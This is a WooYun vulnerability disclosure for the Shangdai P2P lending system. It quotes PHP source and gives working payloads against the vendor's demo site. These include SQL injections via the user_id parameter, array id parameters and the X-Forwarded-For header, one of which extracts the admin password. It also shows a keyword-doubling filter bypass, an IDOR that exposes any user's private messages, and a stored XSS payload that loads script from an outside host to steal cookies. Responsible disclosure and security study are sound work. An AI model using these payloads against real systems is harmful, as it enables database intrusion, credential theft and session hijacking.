当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142675

漏洞标题:尚贷p2p网贷系统二处sql注入/越权/xss(demo成功)

相关厂商:shangdaixitong.com

漏洞作者: 牛肉包子

提交时间:2015-09-22 17:10

修复时间:2015-12-22 14:16

公开时间:2015-12-22 14:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向第三方安全合作伙伴开放
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

只求个首页。
还是有安全狗。但是还是没什么卵用。

详细说明:

注入1(测试不成功)
看到代码core\deayou.core.php 65-86行处

elseif ($_G['query_site'] == 'home') 
{
$user_id = $_REQUEST['user_id'];
if ($user_id == '')
{
$user_id = $_G['user_id'];
}
$_G['article_id'] = $user_id;
$magic->assign('_G', $_G);
usersClass::AddVisit(array('user_id' => $user_id, 'visit_userid' => $_G['user_id']));
if ($home_dir != '')
{
$magic->template_dir = $home_dir;
$magic->assign('tpldir', '/' . $home_dir);
$magic->display($home_template);
}
else
{
$magic->display('home.html');
}
die;
}


然后继续更近

/**
* 最近来访
* @param $param array('user_id' => '会员ID')
* @return bool true/false
*/
public static function AddVisit($data = array()) {
global $mysql;
if (isset($data['visit_userid']) && $data['visit_userid'] != "" && $data['user_id'] != $data['visit_userid']) {
$time = time();
$ip = ip_address();
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} and visit_userid = {$data['visit_userid']}";
$result = $mysql->db_fetch_array($sql);
//判断是否
if ($result != false) {
$sql = "update `{users_visit}` set addtime='{$time}',addip='{$ip}' where id='{$result['id']}'";
$mysql->db_query($sql);
} else {
$sql = "insert into `{users_visit}` set user_id='{$data['user_id']}',visit_userid='{$data['visit_userid']}',addtime='{$time}',addip='{$ip}'";
$mysql->db_query($sql);
}
//如果超过10条,则删除最早的一条
$sql = "select count(1) as num from `{users_visit}` where user_id={$data['user_id']}";
$result = $mysql->db_fetch_array($sql);
if ($result['num'] > 20) {
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} order by addtime asc";
$result = $mysql->db_fetch_array($sql);
$sql = "delete from `{users_visit}` where id='{$result['id']}'";
$mysql->db_query($sql);
}
}
}


其中user_id没有被单引号包裹,所以造成注入。
然后有个全局过滤sql的函数。

function inject_check($sql_str) 
{
$sql = array('select', 'insert', '\\\'', '\\/\\*', '\\.\\.\\/', '\\.\\/', 'union', 'into', 'load_file', 'outfile');
$sql_re = array('', '', '', '', '', '', '', '', '', '', '', '');
return str_replace($sql, $sql_re, $sql_str);
}


写两次就绕过了。然后也使安全狗失效了。

http://demo2.tuanshang.net/?home&user_id=updatexml(1,concat(1,(seselectlect+database())),1)


QQ截图20150921224445.jpg


注入二
modules/message/message.inc.php

elseif ($_U['query_type'] == "senteds"){	

if (isset($_POST['type']) && $_POST['type']==2){

$data['id'] = $_POST['id'];
$data['sent_user'] = $_G['user_id'];
$data['sented'] = 0;
$result = messageClass::update($data);
if ($result!==true){
$msg = array($MsgInfo[$result],"",$_U['query_url']);
}else{
$msg = array("操作成功");
}

}else{
/* $data['sent_user'] = $_G['user_id'];
$data['page'] = $_U['page'];
$data['epage'] = $_U['epage'];
$data['sented'] = 1;
$result = messageClass::GetList($data);
if (is_array($result)){
$pages->set_data($result);
$_U['message_list'] = $result['list'];
$_U['show_page'] = $pages->show(3);
}else{
$msg = array($result,"",$_U['query_url']);
} */
if (isset($_REQUEST['id']) ){
$data['id'] = $_REQUEST['id'];
$data['user_id'] = $_G['user_id'];
$result = messageClass::DeleteMessageReceive($data);
if ($result>0){
$msg = array("删除成功","","/?user&q=code/message");
}else{
$msg = array($MsgInfo[$result]);
}
}else{
$msg = array("请选中再进行操作");
}
}
}


然后跟进DeleteMessageReceive函数

function DeleteMessageReceive($data = array()){
global $mysql;

if (!IsExiest($data['id'])) return "message_receive_id_empty";
if (is_array($data['id'])){
$data['id'] = join(",",$data['id']);
}
$_sql = " where id in ({$data['id']})";
if (isset($data['user_id']) && $data['user_id']!=""){
$_result = self::GetMessageReceiveOne($data);

$_sql .= " and user_id='{$data['user_id']}' and type='user'";
$sql = "delete from `{message_receive}` {$_sql}";
$mysql -> db_query($sql);
if ($_result['type']!='user'){
$sql = "delete from `{message_receive}` where user_id='{$data['user_id']}' and receive_value='{$data['id']}'";
$mysql -> db_query($sql);
}
return $data['user_id'];
}else{
$sql = "delete from `{message_receive}` {$_sql}";
$mysql -> db_query($sql);
}
return $data['id'];
}


可以看到$id可以注入

http://demo2.tuanshang.net/?user&q=code/message/sentdeled
id%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1


QQ截图20150921224807.jpg


modules/message/message.inc.php

elseif ($_U['query_type'] == "sentdeled"){	
if (isset($_REQUEST['id']) ){
$data['id'] = $_REQUEST['id'];
$data['user_id'] = $_G['user_id'];
$result = messageClass::DeleteMessage($data);
if ($result>0){
$msg = array($MsgInfo["message_action_success"],"","/?user&q=code/message/sented");
}else{
$msg = array($MsgInfo[$result]);
}
}else{
$msg = array("请选中再进行操作");
}
}


跟进

function DeleteMessage($data = array()){
global $mysql;

if (!IsExiest($data['id'])) return "message_id_empty";
if (is_array($data['id'])){
$data['id'] = join(",",$data['id']);
}
$_sql = " where id in ({$data['id']})";
if (isset($data['user_id']) && $data['user_id']!=""){
$_sql .= " and user_id='{$data['user_id']}' ";
}
$sql = "delete from `{message}` {$_sql}";
$mysql -> db_query($sql);
return 1;
}


然后id也可以注入

http://demo2.tuanshang.net/?user&q=code/message/senteds
id%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1


QQ截图20150921225144.jpg


注入3

function ip_address() 
{
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
{
$ip_address = $_SERVER["HTTP_CLIENT_IP"];
}
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
{
$ip_address = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
}
else if(!empty($_SERVER["REMOTE_ADDR"]))
{
$ip_address = $_SERVER["REMOTE_ADDR"];
}
else
{
$ip_address = '';
}
return $ip_address;
}


然后

public static function AddVisit($data = array()) {
global $mysql;
if (isset($data['visit_userid']) && $data['visit_userid'] != "" && $data['user_id'] != $data['visit_userid']) {
$time = time();
$ip = ip_address();
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} and visit_userid = {$data['visit_userid']}";
$result = $mysql->db_fetch_array($sql);
//判断是否
if ($result != false) {
$sql = "update `{users_visit}` set addtime='{$time}',addip='{$ip}' where id='{$result['id']}'";
$mysql->db_query($sql);
} else {
$sql = "insert into `{users_visit}` set user_id='{$data['user_id']}',visit_userid='{$data['visit_userid']}',addtime='{$time}',addip='{$ip}'";
$mysql->db_query($sql);
}
//如果超过10条,则删除最早的一条
$sql = "select count(1) as num from `{users_visit}` where user_id={$data['user_id']}";
$result = $mysql->db_fetch_array($sql);
if ($result['num'] > 20) {
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} order by addtime asc";
$result = $mysql->db_fetch_array($sql);
$sql = "delete from `{users_visit}` where id='{$result['id']}'";
$mysql->db_query($sql);
}
}
}


这儿存在注入
设置X-FORWARED-FOR为

xxx' or EXP(~(select * from (select password from tuanshang_users_admin limit 1)a)) or '


QQ截图20150921225349.jpg


注入5

http://demo2.tuanshang.net/?user&q=code/message/sent


发送信息的时候

QQ截图20150921225509.jpg


越权
任意读取站内信

http://demo2.tuanshang.net/?user&q=code/message/viewed&id=1


其中变换id的值就行了。

QQ截图20150921225727.jpg


QQ截图20150921225919.jpg


xss
在发送私信处存在xss。简单的fuzz了一下。然后成功绕过过滤。
在内容处构造

<input onfocus=$.getScript("http://lennyxss.sinaapp.com/sPGu9l?1442846067") autofocus>


成功获取cookie

QQ截图20150921230133.jpg


QQ图片20150921230201.png

漏洞证明:

QQ截图20150921225509.jpg


QQ截图20150921225144.jpg


QQ截图20150921225727.jpg


QQ截图20150921225919.jpg


QQ截图20150921230133.jpg


QQ图片20150921230201.png

修复方案:

过滤+转义

版权声明:转载请注明来源 牛肉包子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-23 14:15

厂商回复:

感谢白帽们的辛苦,该漏洞为V3演示系统所存在的问题,我们将所述问题进行排查修复,同时我们将加强安全漏洞排查,将安全问题放到首位,欢迎对我们的系统安全性继续监督,我们的成长离不开大家的指导和帮助。

最新状态:

暂无